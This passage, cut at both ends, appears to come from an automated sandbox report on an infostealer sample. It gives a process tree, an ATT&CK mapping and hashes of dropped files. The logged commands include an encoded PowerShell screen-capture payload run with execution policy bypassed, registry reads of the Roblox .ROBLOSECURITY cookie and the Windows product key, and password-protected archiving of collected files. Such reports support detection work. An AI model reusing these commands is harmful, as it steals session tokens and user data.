wBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4000
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zrua0swk\zrua0swk.cmdline"
        5⤵
        
        PID:1796
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA19F.tmp" "c:\Users\Admin\AppData\Local\Temp\zrua0swk\CSC980D2563EEFD4AA0857D86F8D84E92.TMP"
        6⤵
        
        PID:3936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2932
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1792
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1308
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3468
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2408
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2708
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:908
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34642\rar.exe a -r -hp"pk" "C:\Users\Admin\AppData\Local\Temp\2xrky.zip" *"
    3⤵
    PID:3664
  - - C:\Users\Admin\AppData\Local\Temp\_MEI34642\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI34642\rar.exe a -r -hp"pk" "C:\Users\Admin\AppData\Local\Temp\2xrky.zip" *
      4⤵
      Executes dropped EXE
      PID:2952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:1392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1868

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:4432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a6c9d692ed2826ecb12c09356e69cc09

SHA1
def728a6138cf083d8a7c61337f3c9dade41a37f

SHA256
a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

SHA512
2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
23d3948ac217212bbecd71da1d06db0b

SHA1
a1368d24c77fe7c7f18b7a12ef25c6ae31389bf3

SHA256
b0f6b9cc9b74d022850c8b90dbd660e7eb57a6e643bc1190803ae6719b2eb841

SHA512
0e082892b6e73b053dda3b07629ce58347627a13faf884698f36e43615bbc9200d79d33f4b025683b03e08dba67f4d5279729e58cae755baa282f88c9fa2f9d0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d3235ed022a42ec4338123ab87144afa

SHA1
5058608bc0deb720a585a2304a8f7cf63a50a315

SHA256
10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27

SHA512
236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA19F.tmp

Filesize
1KB

MD5
6cb87a451caacc35bc6df5a9e16e6c73

SHA1
088c3715f1edb06a3aba99cf643fdf8d6bcd1879

SHA256
9b3ea264e5335757056cff52fd55c994d8547917ce403bab76ad89e431310964

SHA512
a3cbfdff27baab10b5757fee0495312cdb796ae27b7f4b94197347629eac338375a52f66bb86b6e588e89feba4d1fd946562b6fac735a0f9cba05d45c10d3648

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_bz2.pyd

Filesize
48KB

MD5
980eff7e635ad373ecc39885a03fbdc3

SHA1
9a3e9b13b6f32b207b065f5fcf140aecfd11b691

SHA256
b4411706afc8b40a25e638a59fe1789fa87e1ce54109ba7b5bd84c09c86804e1

SHA512
241f9d3e25e219c7b9d12784ab525ab5ded58ca623bc950027b271c8dfb7c19e13536f0caf937702f767413a6d775bed41b06902b778e4bad2946917e16ad4ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_ctypes.pyd

Filesize
59KB

MD5
a8cb7698a8282defd6143536ed821ec9

SHA1
3d1b476b9c042d066de16308d99f1633393a497a

SHA256
40d53a382a78b305064a4f4df50543d2227679313030c9edf5ee82af23bf8f4a

SHA512
1445ae7dc7146afbe391e131baff456445d7e96a3618bfef36dc39af978dd305e3a294acd62ee91a050812c321a9ec298085c7ad4eb9b81e2e40e23c5a85f2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_decimal.pyd

Filesize
105KB

MD5
ccfad3c08b9887e6cea26ddca2b90b73

SHA1
0e0fb641b386d57f87e69457faf22da259556a0d

SHA256
bad3948151d79b16776db9a4a054033a6f2865cb065f53a623434c6b5c9f4aad

SHA512
3af88779db58dcae4474c313b7d55f181f0678c24c16240e3b03721b18b66bdfb4e18d73a3cef0c954d0b8e671cf667fc5e91b5f1027de489a7039b39542b8ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_hashlib.pyd

Filesize
35KB

MD5
89f3c173f4ca120d643aab73980ade66

SHA1
e4038384b64985a978a6e53142324a7498285ec4

SHA256
95b1f5eff9d29eb6e7c6ed817a12ca33b67c76acea3cb4f677ec1e6812b28b67

SHA512
76e737552be1ce21b92fa291777eac2667f2cfc61ae5eb62d133c89b769a8d4ef8082384b5c819404b89a698fcc1491c62493cf8ff0dcc65e01f96b6f7b5e14f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_lzma.pyd

Filesize
86KB

MD5
05adb189d4cfdcacb799178081d8ebcb

SHA1
657382ad2c02b42499e399bfb7be4706343cecab

SHA256
87b7bae6b4f22d7d161aefae54bc523d9c976ea2aef17ee9c3cf8fe958487618

SHA512
13fc9204d6f16a6b815addf95c31ea5c543bf8608bfcc5d222c7075dd789551a202ae442fddc92ea5919ecf58ba91383a0f499182b330b98b240152e3aa868c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_queue.pyd

Filesize
26KB

MD5
fc796fcde996f78225a4ec1bed603606

SHA1
5389f530aaf4bd0d4fce981f57f68a67fe921ee1

SHA256
c7c598121b1d82eb710425c0dc1fc0598545a61ffb1dd41931bb9368fb350b93

SHA512
4d40e5a4ab266646bedacf4fde9674a14795dcfb72aae70a1c4c749f7a9a4f6e302a00753fe0446c1d7cc90caee2d37611d398fdc4c68e48c8bc3637dfd57c15

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_socket.pyd

Filesize
44KB

MD5
f8d03997e7efcdd28a351b6f35b429a2

SHA1
1a7ae96f258547a14f6e8c0defe127a4e445206d

SHA256
aef190652d8466c0455311f320248764acbff6109d1238a26f8983ce86483bf1

SHA512
40c9bce421c7733df37558f48b8a95831cc3cf3e2c2cdf40477b733b14bd0a8a0202bc8bc95f39fcd2f76d21deac21ad1a4d0f6218b8f8d57290968163effef8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_sqlite3.pyd

Filesize
57KB

MD5
3d85e2aa598468d9449689a89816395e

SHA1
e6d01b535c8fc43337f3c56bfc0678a64cf89151

SHA256
6f0c212cb7863099a7ce566a5cf83880d91e38a164dd7f9d05d83cce80fa1083

SHA512
a9a527fc1fcce3ffe95e9e6f4991b1a7156a5ca35181100ea2a25b42838b91e39dd9f06f0efedb2453aa87f90e134467a7662dbbe22c6771f1204d82cc6cea82

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\_ssl.pyd

Filesize
65KB

MD5
615bfc3800cf4080bc6d52ac091ec925

SHA1
5b661997ed1f0a6ea22640b11af71e0655522a10

SHA256
1819dd90e26aa49eb40119b6442e0e60ec95d3025e9c863778dcc6295a2b561f

SHA512
1198426b560044c7f58b1a366a9f8afcde1b6e45647f9ae9c451fb121708aa4371673815be1d35ad1015029c7c1c6ea4755eb3701dbf6f3f65078a18a1daeacb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\base_library.zip

Filesize
1.3MB

MD5
8dad91add129dca41dd17a332a64d593

SHA1
70a4ec5a17ed63caf2407bd76dc116aca7765c0d

SHA256
8de4f013bfecb9431aabaa97bb084fb7de127b365b9478d6f7610959bf0d2783

SHA512
2163414bc01fc30d47d1de763a8332afe96ea7b296665b1a0840d5197b7e56f4963938e69de35cd2bf89158e5e2240a1650d00d86634ac2a5e2ad825455a2d50

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\blank.aes

Filesize
111KB

MD5
708de5bad783d4bae9ebc49914c6af6e

SHA1
347eb599b3c4864788b6db8eb6bab9174f3c95a2

SHA256
a983397d496f1aed7f6206b9e66532224679d70506c2ee44eb10cdc21f290c5e

SHA512
8c72607f7f73fe099dde7946813029941c7e18b7eb2fa8607829a45bd0b8e40c0d5b161250ea63a878404f77afb7c17695e53b89d429a95115be3155bca3d127

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\bound.blank

Filesize
52KB

MD5
e58147a89a26cd3bffd4e0c3d737c1e0

SHA1
3632a5855e042861be4a55cce23351b30eb657e6

SHA256
01a49bced79e71ebacdd4e47b76eea00af65bb9b0fa1f011fb9d1f40c45cad61

SHA512
0afd2ffb399dd9643acaa9096a92cf246e275db53a5519a9edff32abbcb1e69239bb83d8ea0b5a1b681c686185083621754dafc9cd8b5cd720206e613356981d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\libcrypto-3.dll

Filesize
1.6MB

MD5
7f1b899d2015164ab951d04ebb91e9ac

SHA1
1223986c8a1cbb57ef1725175986e15018cc9eab

SHA256
41201d2f29cf3bc16bf32c8cecf3b89e82fec3e5572eb38a578ae0fb0c5a2986

SHA512
ca227b6f998cacca3eb6a8f18d63f8f18633ab4b8464fb8b47caa010687a64516181ad0701c794d6bfe3f153662ea94779b4f70a5a5a94bb3066d8a011b4310d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\libssl-3.dll

Filesize
222KB

MD5
264be59ff04e5dcd1d020f16aab3c8cb

SHA1
2d7e186c688b34fdb4c85a3fce0beff39b15d50e

SHA256
358b59da9580e7102adfc1be9400acea18bc49474db26f2f8bacb4b8839ce49d

SHA512
9abb96549724affb2e69e5cb2c834ecea3f882f2f7392f2f8811b8b0db57c5340ab21be60f1798c7ab05f93692eb0aeab077caf7e9b7bb278ad374ff3c52d248

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\python312.dll

Filesize
1.7MB

MD5
fb8bedf8440eb432c9f3587b8114abc0

SHA1
136bb4dd38a7f6cb3e2613910607131c97674f7c

SHA256
cb627a3c89de8e114c95bda70e9e75c73310eb8af6cf3a937b1e3678c8f525b6

SHA512
b632235d5f60370efa23f8c50170a8ac569ba3705ec3d515efcad14009e0641649ab0f2139f06868024d929defffffefb352bd2516e8cd084e11557b31e95a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\select.pyd

Filesize
25KB

MD5
08b4caeaccb6f6d27250e6a268c723be

SHA1
575c11f72c8d0a025c307cb12efa5cb06705561d

SHA256
bd853435608486555091146ab34b71a9247f4aaa9f7ecfbc3b728a3e3efde436

SHA512
9b525395dec028ef3286c75b88f768e5d40195d4d5adab0775c64b623345d81da1566596cc61a460681bc0adba9727afc96c98ad2e54ff371919f3db6d369b0c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\sqlite3.dll

Filesize
644KB

MD5
482b3f8adf64f96ad4c81ae3e7c0fb35

SHA1
91891d0eabb33211970608f07850720bd8c44734

SHA256
1fbdb4020352e18748434ef6f86b7346f48d6fb9a72c853be7b05e0e53ebbb03

SHA512
5de56e00ab6f48ffc836471421d4e360d913a78ee8e071896a2cd951ff20f7a4123abd98adf003ce166dcc82aad248ebf8b63e55e14eceec8aa9a030067c0d1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI34642\unicodedata.pyd

Filesize
295KB

MD5
27b3af74ddaf9bca239bf2503bf7e45b

SHA1
80a09257f9a4212e2765d492366ed1e60d409e04

SHA256
584c2ecea23dfc72ab793b3fd1059b3ea6fdf885291a3c7a166157cf0e6491c4

SHA512
329c3a9159ea2fdce5e7a28070bcf9d6d67eca0b27c4564e5250e7a407c8b551b68a034bfde9d8d688fa5a1ae6e29e132497b3a630796a97b464762ca0d81bb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ckrxuu4.yuq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
180KB

MD5
e42b6aa3255c2a75ad2e05cd40fe7063

SHA1
bfb988a0eac4686ec396f45f87c35721634e7a74

SHA256
a0b162a146bcf19634559a88877c21fabb512fbed11834f82d2fa60e56f0faa6

SHA512
f4f189d908a3d79506d9e32eb1f59758ee3071ff71ecad1dd75b767fe9a47afb8349fc8c0165779c25506e27625fb0e7e78448ec5f7beca8aad79a4caa645f65

Download Submit
C:\Users\Admin\AppData\Local\Temp\zrua0swk\zrua0swk.dll

Filesize
4KB

MD5
2b7a7ccf541083d7f5b2a3b9556e4c3e

SHA1
bf36b2417c7e3538eb0cccd1f96f2fddf132b398

SHA256
8ae50b99404d0fdbc4d8ba5488a81cc5838d3b63b42599b00ad667d036536f92

SHA512
a693f9d8c3d0c09762566e3206bb0b07d262119a42f05ad962acc08ddcc874f04a47e5a16a48dbddad0fd35b3e841e28fce7dbbacc004d8b5146f67dfcd1844d

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\EnableUnprotect.mp4

Filesize
762KB

MD5
6f5768c7d270729b69f26acb4d3de4c5

SHA1
f2794548973f175bb4a6e3986ee1e9433559cdbc

SHA256
3ee381dcb8f46447952709bdee1c9b6e7b30e6a35ad38860379789e2e2261ce9

SHA512
1f5b756c052b351514b655185006b375d9718e8fe8a135d25d19a26805f5679f1baecf0a591eb96bc04f5620a5d9433c3a9d382889b2d7c8d5d1be426bb16d7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\  ‍ ‏ ‍ \Common Files\Desktop\MeasureTest.jpeg

Filesize
1.0MB

MD5
3cf0cd015ed87b77925a3902854333c1

SHA1
